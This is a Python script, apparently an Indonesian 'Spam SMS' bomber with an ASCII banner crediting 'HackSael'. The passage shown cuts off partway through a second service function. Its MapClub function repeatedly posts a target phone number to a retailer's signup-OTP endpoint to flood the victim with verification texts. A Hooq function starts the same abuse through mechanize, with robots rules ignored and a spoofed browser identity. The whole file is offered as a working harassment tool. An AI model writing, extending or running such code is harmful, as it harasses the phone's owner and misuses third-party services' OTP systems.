
M = '\033[1;31m'

H = '\033[1;32m'

K = '\033[1;33m'

U = '\033[1;34m'

P = '\033[1;35m'

C = '\033[1;36m'

W = '\033[1;37m'

A = '\033[90m'

try:

		import mechanize, requests, random, sys, os, re

	from time import sleep

	from cookielib import LWPCookieJar as Cookie

	from requests.exceptions import ConnectionError

	os.system('clear')

	def Tik(s):

		for i in s + '\n':

			sys.stdout.write(i)

			sys.stdout.flush()

			sleep(random.random() * 0.0010)

	

	def Banner():

		Tik(''+C+'''

	

 _____                         _____               

/  ___|                       /  ___|              

\ `--. _ __   __ _ _ __ ___   \ `--. _ __ ___  ___ 

 `--. \ '_ \ / _` | '_ ` _ \   `--. \ '_ ` _ \/ __|

/\__/ / |_) | (_| | | | | | | /\__/ / | | | | \__ \\

\____/| .__/ \__,_|_| |_| |_| \____/|_| |_| |_|___/

      | |                                          

      |_|  '''+W+'Creator : ./Harga Maulana\n\t\tYT : HackSael')

	def MapClub(Phone, Amount):

		for _ in range(Amount):

			sleep(5)

			headers = {

			'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/600.8.9 (KHTML, like Gecko) Version/8.0.8 Safari/600.8.9',

			'Referer' : 'https://mapclub.com/id/user/signup'

			}

			postData = requests.post('https://cmsapi.mapclub.com/api/signup-otp', data = {'phone' : Phone}, allow_redirects = True)

			if 'error' in postData.text:

				print(W+'['+C+'*'+W+'] KIRIM SPAM KE NOMOR '+C+str(Phone)+W+' GAGAL'+M+' \xE2\x9C\x96')

			

			else:

				print(W+'['+C+'*'+W+'] KIRIM SPAM KE NOMOR '+C+str(Phone)+W+' BERHASIL'+H+' \xE2\x9C\x94')

					

	def Hooq(Phone, Amount):

		for _ in range(Amount):

			sleep(5)

			bro = mechanize.Browser()

			Cookies = Cookie('.cookieslog')

			bro.set_handle_robots(False)

			bro.set_cookiejar(Cookies)

			bro.addheaders = [

			('User-Agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/600.8.9 (KHTML, 
